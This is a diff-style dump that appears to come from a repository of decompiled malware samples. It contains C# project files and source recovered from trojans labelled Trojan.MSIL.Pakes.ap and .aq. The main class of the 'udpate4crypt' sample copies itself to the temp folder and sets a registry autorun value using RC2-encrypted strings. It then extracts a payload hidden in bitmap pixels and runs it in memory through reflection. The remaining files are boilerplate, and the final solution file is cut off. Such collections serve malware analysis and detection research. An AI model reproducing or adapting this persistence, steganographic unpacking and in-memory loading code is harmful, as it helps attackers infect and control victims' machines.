||||||
{
|
|
||||||
internal T GetInstance
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get
|
|
||||||
{
|
|
||||||
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
|
|
||||||
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
|
|
||||||
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public ThreadSafeObjectProvider()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
File diff suppressed because one or more lines are too long
@ -1,51 +0,0 @@
|
|||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
|
||||||
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Pakes.ap-f4471ee56906b80e4b69c7226be029e97a72b82baf0a9ad0f294d21342e36f9a.exe-->
|
|
||||||
<PropertyGroup>
|
|
||||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
|
||||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
|
||||||
<ProjectGuid>{23ED050B-53FC-472A-A537-9B5A52691057}</ProjectGuid>
|
|
||||||
<OutputType>WinExe</OutputType>
|
|
||||||
<AssemblyName>udpate4crypt</AssemblyName>
|
|
||||||
<ApplicationVersion>1.0.0.0</ApplicationVersion>
|
|
||||||
</PropertyGroup>
|
|
||||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
|
||||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
|
||||||
<DebugSymbols>true</DebugSymbols>
|
|
||||||
<DebugType>full</DebugType>
|
|
||||||
<Optimize>false</Optimize>
|
|
||||||
<OutputPath>bin\Debug\</OutputPath>
|
|
||||||
<DefineConstants>DEBUG;TRACE</DefineConstants>
|
|
||||||
<ErrorReport>prompt</ErrorReport>
|
|
||||||
<WarningLevel>4</WarningLevel>
|
|
||||||
</PropertyGroup>
|
|
||||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
|
||||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
|
||||||
<DebugType>pdbonly</DebugType>
|
|
||||||
<Optimize>true</Optimize>
|
|
||||||
<OutputPath>bin\Release\</OutputPath>
|
|
||||||
<DefineConstants>TRACE</DefineConstants>
|
|
||||||
<ErrorReport>prompt</ErrorReport>
|
|
||||||
<WarningLevel>4</WarningLevel>
|
|
||||||
</PropertyGroup>
|
|
||||||
<ItemGroup>
|
|
||||||
<Reference Include="Microsoft.VisualBasic" />
|
|
||||||
<Reference Include="System" />
|
|
||||||
<Reference Include="System.Drawing" />
|
|
||||||
<Reference Include="System.Windows.Forms" />
|
|
||||||
</ItemGroup>
|
|
||||||
<ItemGroup>
|
|
||||||
<Compile Include="gZyQgvIuiwnkbwcosoPFhOUHu.cs" />
|
|
||||||
<Compile Include="FxSÙÉÚßsÞÝWÆCipgùÔOßråÞÒg.cs" />
|
|
||||||
<Compile Include="gÑøçoGñðÝ6ÙÛïàÇNÌwÒËê5ÎÕÍ.cs" />
|
|
||||||
<Compile Include="èóÒÒÆsÝnËÓPÛ8ÏT9DÚÖïàsaáf.cs" />
|
|
||||||
<Compile Include="My\MyApplication.cs" />
|
|
||||||
<Compile Include="My\MyComputer.cs" />
|
|
||||||
<Compile Include="My\MyProject.cs" />
|
|
||||||
<Compile Include="AssemblyInfo.cs" />
|
|
||||||
</ItemGroup>
|
|
||||||
<ItemGroup>
|
|
||||||
<EmbeddedResource Include="OPEtRNjGrHNcOTxRFUpKCVkZr.resx" />
|
|
||||||
</ItemGroup>
|
|
||||||
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
|
|
||||||
</Project>
|
|
@ -1,20 +0,0 @@
|
|||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 9.00
|
|
||||||
# Visual Studio 2005
|
|
||||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "udpate4crypt", "Trojan.MSIL.Pakes.ap-f4471ee56906b80e4b69c7226be029e97a72b82baf0a9ad0f294d21342e36f9a.csproj", "{23ED050B-53FC-472A-A537-9B5A52691057}"
|
|
||||||
EndProject
|
|
||||||
Global
|
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
|
||||||
Debug|Any CPU = Debug|Any CPU
|
|
||||||
Release|Any CPU = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
|
||||||
{23ED050B-53FC-472A-A537-9B5A52691057}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
|
||||||
{23ED050B-53FC-472A-A537-9B5A52691057}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
|
||||||
{23ED050B-53FC-472A-A537-9B5A52691057}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
|
||||||
{23ED050B-53FC-472A-A537-9B5A52691057}.Release|Any CPU.Build.0 = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(SolutionProperties) = preSolution
|
|
||||||
HideSolutionNode = FALSE
|
|
||||||
EndGlobalSection
|
|
||||||
EndGlobal
|
|
@ -1,73 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: gZyQgvIuiwnkbwcosoPFhOUHu
|
|
||||||
// Assembly: udpate4crypt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 541DEA59-E19A-477D-AB3D-3DB3AA857568
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Pakes.ap-f4471ee56906b80e4b69c7226be029e97a72b82baf0a9ad0f294d21342e36f9a.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using Microsoft.Win32;
|
|
||||||
using My;
|
|
||||||
using System;
|
|
||||||
using System.Drawing;
|
|
||||||
using System.IO;
|
|
||||||
using System.Reflection;
|
|
||||||
using System.Resources;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
using System.Windows.Forms;
|
|
||||||
|
|
||||||
public class gZyQgvIuiwnkbwcosoPFhOUHu
|
|
||||||
{
|
|
||||||
private static string ÌèJ8ûùdcÄÍFÞþAÃrÑtf4ßçEìp = Path.GetTempPath();
|
|
||||||
|
|
||||||
[DllImport("Shell32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
||||||
public static extern int ShellExecuteA(
|
|
||||||
IntPtr Parent,
|
|
||||||
[MarshalAs(UnmanagedType.VBByRefStr)] ref string OperationType,
|
|
||||||
[MarshalAs(UnmanagedType.VBByRefStr)] ref string FileLocation,
|
|
||||||
[MarshalAs(UnmanagedType.VBByRefStr)] ref string Parameters,
|
|
||||||
[MarshalAs(UnmanagedType.VBByRefStr)] ref string StartDirectory,
|
|
||||||
int ShowType);
|
|
||||||
|
|
||||||
[STAThread]
|
|
||||||
public static void Main()
|
|
||||||
{
|
|
||||||
string str1 = gZyQgvIuiwnkbwcosoPFhOUHu.ÌèJ8ûùdcÄÍFÞþAÃrÑtf4ßçEìp + Path.GetFileName(Application.ExecutablePath);
|
|
||||||
if (!File.Exists(str1))
|
|
||||||
MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, str1, true);
|
|
||||||
Registry.CurrentUser.OpenSubKey(gÑøçoGñðÝ6ÙÛïàÇNÌwÒËê5ÎÕÍ.TrGFrÒodäñÄTâåçÐüjÑÇâÞõØf("v/68Y/qkJeaS4eDWlF0SbJDFZRIySMJYjAm0AG3+medFAIXZ1ITzRIYCOyMX1R7k", "RKÞSÞSWVðxÞ1PhOõøÒLQÊaþéÅ"), true).SetValue(gÑøçoGñðÝ6ÙÛïàÇNÌwÒËê5ÎÕÍ.TrGFrÒodäñÄTâåçÐüjÑÇâÞõØf("v0LxWsGXUlRG60QRoscrAQ==", "RKÞSÞSWVðxÞ1PhOõøÒLQÊaþéÅ"), (object) str1, RegistryValueKind.String);
|
|
||||||
ResourceManager resourceManager = new ResourceManager(gÑøçoGñðÝ6ÙÛïàÇNÌwÒËê5ÎÕÍ.TrGFrÒodäñÄTâåçÐüjÑÇâÞõØf("SVMNNa5JffQB6QfHfch/EssaiM+Y58r3SHhA4mm7808=", "RKÞSÞSWVðxÞ1PhOõøÒLQÊaþéÅ"), Assembly.GetExecutingAssembly());
|
|
||||||
string str2 = Conversions.ToString(resourceManager.GetObject(gÑøçoGñðÝ6ÙÛïàÇNÌwÒËê5ÎÕÍ.TrGFrÒodäñÄTâåçÐüjÑÇâÞõØf("PjM9rTCOv6/wPdntEYSAw/SARcL/AtIw7ceDd1BVQKY=", "RKÞSÞSWVðxÞ1PhOõøÒLQÊaþéÅ")));
|
|
||||||
byte[] numArray = FxSÙÉÚßsÞÝWÆCipgùÔOßråÞÒg.LlþmQÎ5äìðöNè6ôÌBJäéõ5yCÓ(èóÒÒÆsÝnËÓPÛ8ÏT9DÚÖïàsaáf.ÏlìAhígr8ÁBÌðæbÐèØÇÀöe7Ïï((Bitmap) resourceManager.GetObject(gÑøçoGñðÝ6ÙÛïàÇNÌwÒËê5ÎÕÍ.TrGFrÒodäñÄTâåçÐüjÑÇâÞõØf("QsqlNwxm0pr/yLbIttkT6SE64MMlq3ThA5oEyMM87CE=", "RKÞSÞSWVðxÞ1PhOõøÒLQÊaþéÅ")), str2), str2);
|
|
||||||
byte[] ôPi8àÌélê7À7céùSÈÓðÓsäð3Á = FxSÙÉÚßsÞÝWÆCipgùÔOßråÞÒg.LlþmQÎ5äìðöNè6ôÌBJäéõ5yCÓ(èóÒÒÆsÝnËÓPÛ8ÏT9DÚÖïàsaáf.ÏlìAhígr8ÁBÌðæbÐèØÇÀöe7Ïï((Bitmap) resourceManager.GetObject(gÑøçoGñðÝ6ÙÛïàÇNÌwÒËê5ÎÕÍ.TrGFrÒodäñÄTâåçÐüjÑÇâÞõØf("8raMKXPkQr6UWqQ2+wRTIGesLBIHrpC5+/kdT293+pU=", "RKÞSÞSWVðxÞ1PhOõøÒLQÊaþéÅ")), str2), str2);
|
|
||||||
object[] hÈÒÁíÎNDySFnÝzìî9æYpTÍðùà = new object[3]
|
|
||||||
{
|
|
||||||
(object) numArray,
|
|
||||||
(object) true,
|
|
||||||
(object) "nothing"
|
|
||||||
};
|
|
||||||
gZyQgvIuiwnkbwcosoPFhOUHu.FpgØVóqvïYðøàÅÂHjÕgçÐÃßAÊ((object) ôPi8àÌélê7À7céùSÈÓðÓsäð3Á, gÑøçoGñðÝ6ÙÛïàÇNÌwÒËê5ÎÕÍ.TrGFrÒodäñÄTâåçÐüjÑÇâÞõØf("m76OjKYMBus=", "RKÞSÞSWVðxÞ1PhOõøÒLQÊaþéÅ"), gÑøçoGñðÝ6ÙÛïàÇNÌwÒËê5ÎÕÍ.TrGFrÒodäñÄTâåçÐüjÑÇâÞõØf("k1fBXnzAnwo=", "RKÞSÞSWVðxÞ1PhOõøÒLQÊaþéÅ"), gÑøçoGñðÝ6ÙÛïàÇNÌwÒËê5ÎÕÍ.TrGFrÒodäñÄTâåçÐüjÑÇâÞõØf("KNt/euSAGWQ=", "RKÞSÞSWVðxÞ1PhOõøÒLQÊaþéÅ"), hÈÒÁíÎNDySFnÝzìî9æYpTÍðùÃ);
|
|
||||||
}
|
|
||||||
|
|
||||||
public static void FpgØVóqvïYðøàÅÂHjÕgçÐÃßAÊ(
|
|
||||||
object ôPi8àÌélê7À7céùSÈÓðÓsäð3Á,
|
|
||||||
string XìrëjÐ1ùSÀjû3RUØÎãüruÑüCF,
|
|
||||||
string LÏßv6GdeÆyßnÃwqyC9eÊWÅsÐû,
|
|
||||||
string è0óË6ÏîeÛN1VyMk6ÐvÝzZAbÅö,
|
|
||||||
object[] hÈÒÁíÎNDySFnÝzìî9æYpTÍðùÃ)
|
|
||||||
{
|
|
||||||
System.Type Type = typeof (Assembly);
|
|
||||||
object[] objArray = new object[1]
|
|
||||||
{
|
|
||||||
RuntimeHelpers.GetObjectValue(ôPi8àÌélê7À7céùSÈÓðÓsäð3Á)
|
|
||||||
};
|
|
||||||
object[] Arguments = objArray;
|
|
||||||
bool[] flagArray = new bool[1]{ true };
|
|
||||||
bool[] CopyBack = flagArray;
|
|
||||||
NewLateBinding.LateGet((object) null, Type, "Load", Arguments, (string[]) null, (System.Type[]) null, CopyBack);
|
|
||||||
if (flagArray[0])
|
|
||||||
ôPi8àÌélê7À7céùSÈÓðÓsäð3Á = RuntimeHelpers.GetObjectValue(objArray[0]);
|
|
||||||
object obj;
|
|
||||||
obj.GetType().InvokeMember(è0óË6ÏîeÛN1VyMk6ÐvÝzZAbÅö, BindingFlags.InvokeMethod, (Binder) null, RuntimeHelpers.GetObjectValue(obj), hÈÒÁíÎNDySFnÝzìî9æYpTÍðùÃ);
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,25 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: gÑøçoGñðÝ6ÙÛïàÇNÌwÒËê5ÎÕÍ
|
|
||||||
// Assembly: udpate4crypt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 541DEA59-E19A-477D-AB3D-3DB3AA857568
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Pakes.ap-f4471ee56906b80e4b69c7226be029e97a72b82baf0a9ad0f294d21342e36f9a.exe
|
|
||||||
|
|
||||||
using System;
|
|
||||||
using System.Security.Cryptography;
|
|
||||||
using System.Text;
|
|
||||||
|
|
||||||
public class gÑøçoGñðÝ6ÙÛïàÇNÌwÒËê5ÎÕÍ
|
|
||||||
{
|
|
||||||
public static string TrGFrÒodäñÄTâåçÐüjÑÇâÞõØf(
|
|
||||||
string Kå1ÍÀ4b6áßÕåàøXqídxozïxóa,
|
|
||||||
string ÅÒúÕbb2WPTfïYR1nÓD1ïmëÂlL)
|
|
||||||
{
|
|
||||||
RC2CryptoServiceProvider cryptoServiceProvider = new RC2CryptoServiceProvider();
|
|
||||||
byte[] hash = new MD5CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(ÅÒúÕbb2WPTfïYR1nÓD1ïmëÂlL));
|
|
||||||
cryptoServiceProvider.Key = hash;
|
|
||||||
cryptoServiceProvider.Mode = CipherMode.ECB;
|
|
||||||
ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor();
|
|
||||||
byte[] inputBuffer = Convert.FromBase64String(Kå1ÍÀ4b6áßÕåàøXqídxozïxóa);
|
|
||||||
return Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,67 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: èóÒÒÆsÝnËÓPÛ8ÏT9DÚÖïàsaáf
|
|
||||||
// Assembly: udpate4crypt, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 541DEA59-E19A-477D-AB3D-3DB3AA857568
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.MSIL.Pakes.ap-f4471ee56906b80e4b69c7226be029e97a72b82baf0a9ad0f294d21342e36f9a.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using System;
|
|
||||||
using System.Collections.Generic;
|
|
||||||
using System.Drawing;
|
|
||||||
|
|
||||||
public class èóÒÒÆsÝnËÓPÛ8ÏT9DÚÖïàsaáf
|
|
||||||
{
|
|
||||||
public static byte[] ÏlìAhígr8ÁBÌðæbÐèØÇÀöe7Ïï(
|
|
||||||
Bitmap Ð8FUXkÎðcô7ïcUäìZ0EHvQñlT,
|
|
||||||
string öÞÜVnbeRPÛåQMäGwÛÉïTàÁtâÑ)
|
|
||||||
{
|
|
||||||
byte[] numArray;
|
|
||||||
try
|
|
||||||
{
|
|
||||||
List<byte> byteList = new List<byte>();
|
|
||||||
string str = öÞÜVnbeRPÛåQMäGwÛÉïTàÁtâÑ;
|
|
||||||
int index = 0;
|
|
||||||
int length = str.Length;
|
|
||||||
int num1;
|
|
||||||
while (index < length)
|
|
||||||
{
|
|
||||||
char String = str[index];
|
|
||||||
checked { num1 += Strings.Asc(String); }
|
|
||||||
checked { ++index; }
|
|
||||||
}
|
|
||||||
int num2 = checked (Ð8FUXkÎðcô7ïcUäìZ0EHvQñlT.Width - 1);
|
|
||||||
int x = 0;
|
|
||||||
while (x <= num2)
|
|
||||||
{
|
|
||||||
int num3 = checked (Ð8FUXkÎðcô7ïcUäìZ0EHvQñlT.Height - 1);
|
|
||||||
int y = 0;
|
|
||||||
while (y <= num3)
|
|
||||||
{
|
|
||||||
Color color = Ð8FUXkÎðcô7ïcUäìZ0EHvQñlT.GetPixel(x, y);
|
|
||||||
int r = (int) color.R;
|
|
||||||
int g = (int) color.G;
|
|
||||||
int b = (int) color.B;
|
|
||||||
int num4 = 0;
|
|
||||||
int num5 = r % (int) byte.MaxValue;
|
|
||||||
int num6 = checked (b - unchecked (checked (unchecked (num5 % (int) byte.MaxValue) + g) % (int) byte.MaxValue / 3));
|
|
||||||
int num7 = checked (num5 + (int) byte.MaxValue * num6) ^ num1;
|
|
||||||
if (num7 != 47)
|
|
||||||
byteList.Add(checked ((byte) (num7 - (int) byte.MaxValue)));
|
|
||||||
color = new Color();
|
|
||||||
num4 = 0;
|
|
||||||
checked { ++y; }
|
|
||||||
}
|
|
||||||
checked { ++x; }
|
|
||||||
}
|
|
||||||
numArray = byteList.ToArray();
|
|
||||||
}
|
|
||||||
catch (Exception ex)
|
|
||||||
{
|
|
||||||
ProjectData.SetProjectError(ex);
|
|
||||||
numArray = (byte[]) null;
|
|
||||||
ProjectData.ClearProjectError();
|
|
||||||
}
|
|
||||||
return numArray;
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,3 +0,0 @@
|
|||||||
using System.Reflection;
|
|
||||||
|
|
||||||
[assembly: AssemblyVersion("0.0.0.0")]
|
|
@ -1,18 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyApplication
|
|
||||||
// Assembly: Server Attacker V32, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 924A35BE-71BC-492C-B989-A039BE23F604
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Pakes.aq-b4490e288f98bd084797e54bb3a2293bff644bdecabcebf1a6f4cb7a91e2c136.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.ApplicationServices;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[GeneratedCode("MyTemplate", "10.0.0.0")]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal class MyApplication : ApplicationBase
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,24 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyComputer
|
|
||||||
// Assembly: Server Attacker V32, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 924A35BE-71BC-492C-B989-A039BE23F604
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Pakes.aq-b4490e288f98bd084797e54bb3a2293bff644bdecabcebf1a6f4cb7a91e2c136.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic.Devices;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.Diagnostics;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[GeneratedCode("MyTemplate", "10.0.0.0")]
|
|
||||||
internal class MyComputer : Computer
|
|
||||||
{
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public MyComputer()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,108 +0,0 @@
|
|||||||
// Decompiled with JetBrains decompiler
|
|
||||||
// Type: My.MyProject
|
|
||||||
// Assembly: Server Attacker V32, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
||||||
// MVID: 924A35BE-71BC-492C-B989-A039BE23F604
|
|
||||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Pakes.aq-b4490e288f98bd084797e54bb3a2293bff644bdecabcebf1a6f4cb7a91e2c136.exe
|
|
||||||
|
|
||||||
using Microsoft.VisualBasic;
|
|
||||||
using Microsoft.VisualBasic.ApplicationServices;
|
|
||||||
using Microsoft.VisualBasic.CompilerServices;
|
|
||||||
using System;
|
|
||||||
using System.CodeDom.Compiler;
|
|
||||||
using System.ComponentModel;
|
|
||||||
using System.ComponentModel.Design;
|
|
||||||
using System.Diagnostics;
|
|
||||||
using System.Runtime.CompilerServices;
|
|
||||||
using System.Runtime.InteropServices;
|
|
||||||
|
|
||||||
namespace My
|
|
||||||
{
|
|
||||||
[GeneratedCode("MyTemplate", "10.0.0.0")]
|
|
||||||
[StandardModule]
|
|
||||||
[HideModuleName]
|
|
||||||
internal sealed class MyProject
|
|
||||||
{
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
|
|
||||||
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
|
|
||||||
|
|
||||||
[HelpKeyword("My.Computer")]
|
|
||||||
internal static MyComputer Computer
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.Application")]
|
|
||||||
internal static MyApplication Application
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.User")]
|
|
||||||
internal static User User
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[HelpKeyword("My.WebServices")]
|
|
||||||
internal static MyProject.MyWebServices WebServices
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
|
|
||||||
}
|
|
||||||
|
|
||||||
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal sealed class MyWebServices
|
|
||||||
{
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public override int GetHashCode() => base.GetHashCode();
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
internal new Type GetType() => typeof (MyProject.MyWebServices);
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public override string ToString() => base.ToString();
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
|
|
||||||
|
|
||||||
[DebuggerHidden]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
public MyWebServices()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[ComVisible(false)]
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
internal sealed class ThreadSafeObjectProvider<T> where T : new()
|
|
||||||
{
|
|
||||||
internal T GetInstance
|
|
||||||
{
|
|
||||||
[DebuggerHidden] get
|
|
||||||
{
|
|
||||||
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
|
|
||||||
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
|
|
||||||
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
[EditorBrowsable(EditorBrowsableState.Never)]
|
|
||||||
[DebuggerHidden]
|
|
||||||
public ThreadSafeObjectProvider()
|
|
||||||
{
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,46 +0,0 @@
|
|||||||
<?xml version="1.0" encoding="utf-8"?>
|
|
||||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
|
||||||
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.MSIL.Pakes.aq-b4490e288f98bd084797e54bb3a2293bff644bdecabcebf1a6f4cb7a91e2c136.exe-->
|
|
||||||
<PropertyGroup>
|
|
||||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
|
||||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
|
||||||
<ProjectGuid>{D8F28A04-9D79-44FC-8C85-AE2F73816288}</ProjectGuid>
|
|
||||||
<OutputType>WinExe</OutputType>
|
|
||||||
<AssemblyName>Server Attacker V32</AssemblyName>
|
|
||||||
<ApplicationVersion>0.0.0.0</ApplicationVersion>
|
|
||||||
<RootNamespace>My</RootNamespace>
|
|
||||||
</PropertyGroup>
|
|
||||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
|
||||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
|
||||||
<DebugSymbols>true</DebugSymbols>
|
|
||||||
<DebugType>full</DebugType>
|
|
||||||
<Optimize>false</Optimize>
|
|
||||||
<OutputPath>bin\Debug\</OutputPath>
|
|
||||||
<DefineConstants>DEBUG;TRACE</DefineConstants>
|
|
||||||
<ErrorReport>prompt</ErrorReport>
|
|
||||||
<WarningLevel>4</WarningLevel>
|
|
||||||
</PropertyGroup>
|
|
||||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
|
||||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
|
||||||
<DebugType>pdbonly</DebugType>
|
|
||||||
<Optimize>true</Optimize>
|
|
||||||
<OutputPath>bin\Release\</OutputPath>
|
|
||||||
<DefineConstants>TRACE</DefineConstants>
|
|
||||||
<ErrorReport>prompt</ErrorReport>
|
|
||||||
<WarningLevel>4</WarningLevel>
|
|
||||||
</PropertyGroup>
|
|
||||||
<ItemGroup>
|
|
||||||
<Reference Include="Microsoft.VisualBasic" />
|
|
||||||
<Reference Include="System" />
|
|
||||||
<Reference Include="System.Windows.Forms" />
|
|
||||||
</ItemGroup>
|
|
||||||
<ItemGroup>
|
|
||||||
<Compile Include="zvkFulzKssfStPc.cs" />
|
|
||||||
<Compile Include="Ujdnd7sjD9ad.cs" />
|
|
||||||
<Compile Include="MyApplication.cs" />
|
|
||||||
<Compile Include="MyComputer.cs" />
|
|
||||||
<Compile Include="MyProject.cs" />
|
|
||||||
<Compile Include="AssemblyInfo.cs" />
|
|
||||||
</ItemGroup>
|
|
||||||
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
|
|
||||||
</Project>
|
|
@ -1,20 +0,0 @@
|
|||||||
|
|
||||||
Microsoft Visual Studio Solution File, Format Version 9.00
|
|
||||||
# Visual Studio 2005
|
|
||||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Server Attacker V32", "Trojan.MSIL.Pakes.aq-b4490e288f98bd084797e54bb3a2293bff644bdecabcebf1a6f4cb7a91e2c136.csproj", "{D8F28A04-9D79-44FC-8C85-AE2F73816288}"
|
|
||||||
EndProject
|
|
||||||
Global
|
|
||||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
|
||||||
Debug|Any CPU = Debug|Any CPU
|
|
||||||
Release|Any CPU = Release|Any CPU
|
|
||||||
EndGlobalSection
|
|
||||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
|
||||||
{D8F28A04-9D79-44FC-8C85-AE2F73816288}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
|
||||||
